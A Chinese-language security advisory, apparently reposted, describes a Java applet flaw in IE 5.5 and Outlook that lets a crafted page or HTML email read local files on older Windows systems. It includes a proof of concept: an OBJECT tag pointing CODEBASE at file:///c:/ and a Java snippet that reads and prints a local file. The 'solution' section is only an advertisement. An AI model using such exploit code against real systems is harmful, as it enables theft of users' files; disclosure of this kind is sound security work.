IE 5.5/Outlook java存在安全漏洞

涉及程序：

IE 5.5/Outlook

描述：

IE 5.5/Outlook java存在安全漏洞

详细：

一个攻击者能通过一个指定的Java applet代码库，然后通过HTML邮件或网站提交给目标主机

能获得在远程系统上的读取权限。当用户在使用Microsoft Internet Explorer

或Outlook/Outlook Express时，与一个jar文件相关联的applet程序运行。这样一个恶意

的攻击者可以通过诱惑用户访问他自己创建的网页或HTML文件来打开用户的电子邮件或是了解到

用户的URL。这样可以获得用户的敏感信息。

以下代码仅仅用来测试和研究这个漏洞，如果您将其用于不正当的途径请后果自负

javacodebase1.html

<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>

<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">

<PARAM NAME="CODEBASE" VALUE="file:///c:/">

<PARAM NAME="URL" VALUE="file:///c:/test.txt">

</OBJECT>

gjavacodebase.java

......

try

{

u = new URL(getParameter("URL"));

InputStream is=u.openStream();

byte ba[]=new byte[1000];

int l=is.read(ba);

InputStream os=u.openConnection().getInputStream();

String s1=new String(ba,0,l);

print(u.toString());

print(s1);

}

.......

受影响的系统：

Microsoft Windows 98

Microsoft Windows 95

Microsoft Windows NT 4.0

Microsoft Windows NT 2000

解决方案：

CNNS为您提供完善的网络安全服务。

原文转自：http://www.ltesting.net